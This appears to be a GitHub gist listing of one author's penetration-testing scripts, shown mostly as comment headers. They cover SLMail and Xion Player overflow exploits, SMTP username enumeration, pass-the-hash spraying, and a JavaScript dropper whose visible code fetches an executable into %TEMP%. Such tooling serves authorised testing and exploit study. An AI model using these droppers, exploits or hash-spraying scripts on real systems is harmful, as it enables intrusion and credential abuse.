mgeeky
/ padding-oracle-tests.py
Last active
June 2, 2017 19:42
Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Padding Oracle test-cases generator. | |
| # Mariusz B. / mgeeky, 2016 | |
| # v0.2 | |
| # | |
| # Simple utility that aids the penetration tester when manually testing Padding Oracle condition | |
| # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. | |
| # | |
| # Script that takes from input an encoded cipher text, tries to detect applied encoding, decodes the cipher |
mgeeky
/ burp-curl-beautifier.py
Created
August 11, 2016 14:40
Simple script for making "Copy as curl command" output in system's clipboard a little nicer, at least for me.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple script for making "Copy as curl command" output in system's clipboard a little nicer\ | |
| # To use it: | |
| # - firstly right click on request in BurpSuite | |
| # - select "Copy as curl command" | |
| # - then launch this script. | |
| # As a result, you'll have a bit nicer curl command in your clipboard. | |
| # |
mgeeky
/ slmail-dep-bypass-example.py
Last active
August 12, 2016 02:21
Example of an old DEP Bypass technique on a SLMail 5.5 stack-based overflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Classic & old SLMail 5.5 PASS stack-based buffer overflow revisited for DEP Bypass | |
| # via ROP to ZwSetInformationProcess with `leave`-based stack pivotting. | |
| # Not overcoming ASLR, tested on Windows XP SP3 English. | |
| # | |
| # After launching, hit: $ nc victim 4444 | |
| # | |
| # Prepared for educational purposes, if someone wants to go through first DEP Bypasses on | |
| # this particular vulnerability. | |
| # |
mgeeky
/ xion-1-unicode-exploit.py
Last active
August 18, 2016 13:29
Xion Player (r2 studios) 1.0 121 build example of unicode-compatible venetian shellcode/exploit (Corelan.be Exploit Writing Tutorial, part 7)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Corelan.be Exploit Writing tutorial part 7. Unicode | |
| # Example 1: r2 Studios Xion 1.0 121 build stack-based unicode overflow | |
| # | |
| # Example of unicode-compatible exploit. | |
| # No ASLR compatible, no DEP either. | |
| # Tested on Windows XP SP3. | |
| # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import netaddr | |
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| from scapy.all import sr1, IP, ICMP | |
| PING_TIMEOUT = 3 | |
| IFACE='eth0' |
mgeeky
/ smtpvrfy.py
Last active
October 8, 2024 15:29
SMTP VRFY python tool intended to check whether SMTP server is leaking usernames.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple script intended to abuse SMTP server's VRFY command to leak | |
| # usernames having accounts registered within it. | |
| # | |
| # Mariusz B., 2016 | |
| # | |
| import socket | |
| import sys |
mgeeky
/ startvpn.sh
Last active
February 5, 2020 20:04
OpenVPN client spawning script, awaiting for Network Unreachable status to re-launch the client.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Quick info: | |
| # - script that is running OpenVPN client in a loop, breaking out of it when | |
| # the "Network is unreachable" message comes up | |
| # - after each client termination it wipes out left tunnel interfaces (tap0, tap1, .., tapN) | |
| # - also it kills all of the running OpenVPN clients, preventing consecutive logons. | |
| # | |
| # Some Background: |
mgeeky
/ nmap-grep-to-table.sh
Created
August 27, 2016 22:42
Script converting nmap's greppable output (-oG) into a printable per-host tables.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Simple script converting nmap's greppable output into a | |
| # printable per-host table with protocol, port, state and service | |
| # columns in it. | |
| # | |
| # | |
| # WARNING: |
mgeeky
/ pth-carpet.py
Last active
December 6, 2016 04:22
Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple script intended to perform Carpet Bombing against list | |
| # of provided machines using list of provided LSA Hashes (LM:NTLM). | |
| # The basic idea with Pass-The-Hash attack is to get One hash and use it | |
| # against One machine. There is a problem with this approach of not having information, | |
| # onto what machine we could have applied the hash. | |
| # To combat this issue - the below script was born. | |
| # |
mgeeky
/ backdoor-drop.js
Created
September 8, 2016 10:20
Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| var SRC = ""; | |
| var CMDLINE = ""; | |
| var out = Math.random().toString(36).substring(7) + ".exe"; | |
| var axo = this.ActiveXObject; | |
| var wshell = new axo("WScript.Shell"); | |
| var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out; | |
| var xhr = new axo("MSXML2.XMLHTTP"); | |
| xhr.onreadystatechange = function () { |